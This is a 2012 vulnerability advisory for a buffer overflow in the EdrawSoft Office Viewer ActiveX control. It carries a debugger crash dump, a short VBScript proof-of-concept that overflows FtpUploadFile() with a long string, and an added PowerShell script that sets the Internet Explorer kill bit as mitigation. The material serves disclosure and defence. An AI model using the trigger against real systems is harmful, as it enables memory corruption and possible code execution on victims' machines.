EdrawSoft Office Viewer Component ActiveX 5.6 (officeviewermme.ocx) BoF PoC
Source: http://www.zeroscience.mk  Author: LiquidWorm  Published: 2012-02-01
Vendor: EdrawSoft
Product web page: http://www.edrawsoft.com
Affected version: 5.6.5781
Summary: Edraw Office Viewer Component contains a standard ActiveX control
that acts as an ActiveX document container for hosting Office documents
(including Microsoft Word, Microsoft Excel, Microsoft PowerPoint, Microsoft
Project, and Microsoft Visio documents) in a custom form or Web page. The
control is lightweight and flexible, and gives developers new possibilities
for using Office in a custom solution.
Desc: The ActiveX control suffers from a buffer overflow vulnerability when a
large amount of data is passed to the FtpUploadFile member in the FtpUploadFile()
function, resulting in memory corruption that overwrites several registers,
including the SEH. An attacker can gain access to the system of the affected
node and execute arbitrary code.
Tested on Microsoft Windows XP Professional SP3 (EN)
-------------------------------------------------------------------------
(6c9c.6c70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=00001015 ecx=000002a0 edx=001b2edc esi=0186e518 edi=01870000
eip=220324cc esp=0186c488 ebp=0186c490 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mindjet\MindManager 10\officeviewermme.ocx -
officeviewermme!DllRegisterServer+0x23bbe:
220324cc 668907          mov     word ptr [edi],ax        ds:0023:01870000=????
0:004> !exchain
0186fa84: 00410041
Invalid exception stack at 00410041
0:004> d esi
0186e518  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e528  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e538  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e548  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e558  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e568  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e578  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186e588  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0:004> d edx
001b2edc  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2eec  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2efc  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f0c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f1c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f2c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f3c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001b2f4c  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0:004> d esp+3000
0186f488  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f498  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4e8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0186f4f8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0:004> !load msec; !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at officeviewermme!DllRegisterServer+0x0000000000023bbe (Hash=0x55146322.0x550a2c22)
User mode write access violations that are not near NULL are exploitable.
-------------------------------------------------------------------------
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab - http://www.zeroscience.mk
Advisory ID: ZSL-2012-5069
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php
Related ID: ZSL-2012-5068
25.01.2012
---
<object classid='clsid:F6FE8878-54D2-4333-B9F0-FC543B1BE1ED' id='ZSL' />
<script language='vbscript'>
targetFile = "C:\Program Files\Mindjet\MindManager 10\officeviewermme.ocx"
prototype  = "Function FtpUploadFile ( ByVal LocalFile As String ,  ByVal RemoteFile As String ) As Boolean"
memberName = "FtpUploadFile"
progid     = "OfficeViewer.OfficeViewer"
argCount   = 2
arg1="defaultV"
arg2=String(4116, "A")
ZSL.FtpUploadFile arg1 ,arg2
</script>
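For defenders, the standard host-side mitigation for a vulnerable ActiveX control is the Internet Explorer kill bit: setting bit 0x400 in "Compatibility Flags" under the control's CLSID in HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility stops IE from instantiating it. The script below is an added example, not part of the ZSL advisory or of any EdrawSoft or Mindjet code. It takes the CLSID from the PoC's <object> tag and the affected version from the advisory header; the function names, the inventory step (reading the registered InprocServer32 path and its file version) and the Wow6432Node handling are this example's own assumptions. It must be run from an elevated PowerShell prompt.

```powershell
# Added example (not from the advisory or the vendor). Inventory the registered
# server for the Edraw Office Viewer CLSID and set the IE kill bit for it.

$Clsid           = '{F6FE8878-54D2-4333-B9F0-FC543B1BE1ED}'   # CLSID from the PoC's <object> tag
$AffectedVersion = [version]'5.6.5781'                        # version listed in the advisory
$KillBit         = 0x400                                      # COMPAT_EVIL_DONT_LOAD

function Get-ControlServer {
    # Returns the DLL/OCX path registered for the CLSID and its Major.Minor.Build
    # file version, or $null when the CLSID is not registered on this host.
    param([string]$Clsid)
    $reg = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32"
    if (-not (Test-Path $reg)) { return $null }
    $path = (Get-ItemProperty -Path $reg).'(default)'
    if (-not $path) { return $null }
    $file = Get-Item -LiteralPath $path -ErrorAction SilentlyContinue
    $ver  = $null
    if ($file) {
        $vi  = $file.VersionInfo
        # Build a 3-part version so it compares cleanly with the advisory's "5.6.5781".
        $ver = [version]"$($vi.FileMajorPart).$($vi.FileMinorPart).$($vi.FileBuildPart)"
    }
    [pscustomobject]@{
        Path              = $path
        Version           = $ver
        IsAdvisoryVersion = ($null -ne $ver -and $ver -eq $AffectedVersion)
    }
}

function Set-ActiveXKillBit {
    # Writes the kill bit under every ActiveX Compatibility key that applies and
    # returns the key paths it touched. Existing flags are preserved with -bor.
    param([string]$Clsid)
    $keys = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
    # On 64-bit Windows the 32-bit IE reads the Wow6432Node view; set both when present.
    if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
        $keys += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    }
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $cur = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $cur) { $cur = 0 }
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ($cur -bor $KillBit) -Type DWord
    }
    return $keys
}

function Test-ActiveXKillBit {
    # True when the kill bit is present in the native (non-Wow6432Node) key.
    param([string]$Clsid)
    $key   = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band $KillBit) -ne 0)
}

$server = Get-ControlServer -Clsid $Clsid
if ($null -eq $server) {
    "CLSID $Clsid is not registered on this host."
} else {
    "Registered server : $($server.Path)"
    "File version      : $($server.Version)  (advisory lists $AffectedVersion; match = $($server.IsAdvisoryVersion))"
}
Set-ActiveXKillBit -Clsid $Clsid | ForEach-Object { "Kill bit written under $_" }
if (Test-ActiveXKillBit -Clsid $Clsid) { "Kill bit confirmed for $Clsid" } else { "Kill bit NOT set for $Clsid" }
```

The kill bit only stops Internet Explorer (and other hosts that honour the ActiveX Compatibility key) from loading the control; it does not remove officeviewermme.ocx or correct the FtpUploadFile() defect for applications that host the control directly, such as the MindManager installation whose copy of the OCX the PoC points at. Treat it as a containment step until a fixed build is installed.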